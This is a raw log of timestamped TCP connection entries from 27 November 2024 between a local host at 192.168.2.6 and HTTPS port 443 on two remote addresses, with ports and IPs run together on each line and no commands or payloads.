                                                  Nov 27, 2024 18:09:55.847328901 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.854454041 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.870371103 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.870383978 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.116573095 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116640091 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116651058 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116681099 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116693974 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116714001 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116780996 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.116802931 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.116816044 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.116847992 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.161986113 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.162020922 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.162123919 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.162134886 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.162178993 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.296319962 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.296762943 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.296788931 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.297836065 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.297919989 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.298330069 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.298399925 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.298507929 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.298525095 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.298547983 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.300169945 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.300283909 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.300340891 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.300801039 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.300822973 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.327284098 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.327332973 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.327455044 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.327471972 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.327517986 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.338051081 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.338077068 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.362943888 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.362968922 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.363078117 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.363094091 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.363143921 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.382839918 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.383471012 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.383496046 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.383976936 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.383991957 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.393562078 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.393588066 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.393676043 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.393686056 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.393745899 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.429729939 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.429754019 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.429858923 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.429866076 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.429915905 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.477560043 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.478250980 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.478276014 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.478754044 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.478760958 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.537682056 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.537708998 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.537808895 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.537827015 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.537872076 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.548645973 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.549747944 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.549762964 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.550311089 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.550317049 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.561815023 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.561849117 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.561918974 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.561927080 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.561975002 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.579241037 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.579283953 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.579334974 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.579339981 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.579355955 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.579401016 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.579745054 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.579758883 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.616184950 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.616242886 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.616312981 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.616447926 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.616482973 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.616533041 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.621193886 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.621211052 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.621354103 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.621375084 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.656599045 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.657179117 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.657208920 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.657665014 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.657670021 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.735965967 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.736016989 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.736088037 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.736349106 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:56.736365080 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:56.763010979 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.763665915 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.763698101 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.764179945 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.764188051 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.854669094 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.854806900 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.854891062 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.855056047 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.855082989 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.855101109 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.855108976 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.858340025 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.858380079 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.858467102 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.858658075 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.858665943 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.921443939 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.921530008 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.921603918 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.925656080 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.925657034 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.925683022 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.925692081 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.932321072 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.932365894 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:56.932446957 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.932641029 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:56.932657957 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.018445015 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.018512964 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.018603086 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.018961906 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.018978119 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.018994093 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.019000053 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.021992922 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.022047997 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.022169113 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.026351929 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.026375055 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.113895893 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.113966942 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.114049911 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.114243984 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.114260912 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.114273071 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.114278078 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.117261887 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.117304087 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.117393017 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.117523909 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.117535114 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.222908020 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.222976923 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.223031998 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.225783110 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.225802898 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.225816965 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.225821972 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.228840113 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.228894949 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:57.229055882 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.229151964 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:57.229166031 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.109225988 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.109615088 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.109653950 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.110131025 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.110588074 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.110677958 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.110764027 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.151338100 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.197647095 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.197926044 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.197992086 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.198373079 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.198399067 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.227232933 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.227503061 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.227519035 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.228673935 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.228717089 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.228821039 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.228903055 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.228969097 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.229075909 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.229252100 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.229260921 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.229262114 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.229721069 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.229767084 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.230335951 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.230396032 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.230432034 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.231197119 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.231260061 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.231610060 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.231618881 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.271331072 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.285011053 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.501192093 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.501554012 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.501641989 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.501873016 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.501907110 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.733772039 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.734378099 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.734424114 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.734939098 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.734951019 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.858719110 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.859416962 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.859462976 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.859942913 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.859951973 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.868947029 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.869474888 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.869514942 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.869884968 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.869896889 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.903933048 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.904053926 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.905116081 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.905174017 CET4434978094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:58.905253887 CET49780443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:58.910439014 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.911042929 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.911082983 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:58.911533117 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:58.911541939 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.019907951 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.020513058 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.020535946 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.021085978 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.021090031 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.043667078 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043693066 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043699980 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043720007 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043732882 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043749094 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043780088 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.043807030 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.043823957 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.043862104 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.088289976 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.088310003 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.088398933 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.088427067 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.088623047 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.180450916 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.180526972 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.180658102 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.180824041 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.180845976 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.180857897 CET49783443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.180864096 CET4434978313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.184217930 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.184262991 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.184361935 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.184540033 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.184552908 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.244738102 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.244761944 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.244853020 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.244884968 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.245469093 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.279846907 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.279864073 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.279934883 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.279961109 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.280424118 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.287549973 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.287574053 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.287605047 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.287669897 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.287720919 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.287741899 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.287776947 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.303479910 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.303558111 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.303672075 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.307337046 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.307369947 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.307461023 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.307497978 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.308727026 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.324538946 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.324605942 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.324676037 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.328207970 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.328232050 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.328247070 CET49785443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.328254938 CET4434978513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.330312014 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.330332041 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.330409050 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.330430984 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.330492973 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.331693888 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.331739902 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.332652092 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.333316088 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.333338022 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.334587097 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.334613085 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.335761070 CET49784443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.335781097 CET4434978413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.335803032 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.336206913 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.336216927 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.338386059 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338417053 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.338481903 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338521957 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338541985 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.338588953 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338748932 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338761091 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.338768005 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.338772058 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.339667082 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.339687109 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.339746952 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.339773893 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.339806080 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.342624903 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.363878965 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.363929987 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.363950014 CET4434978194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.363982916 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.364003897 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.364305973 CET49781443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.364322901 CET4434978194.247.42.112192.168.2.6
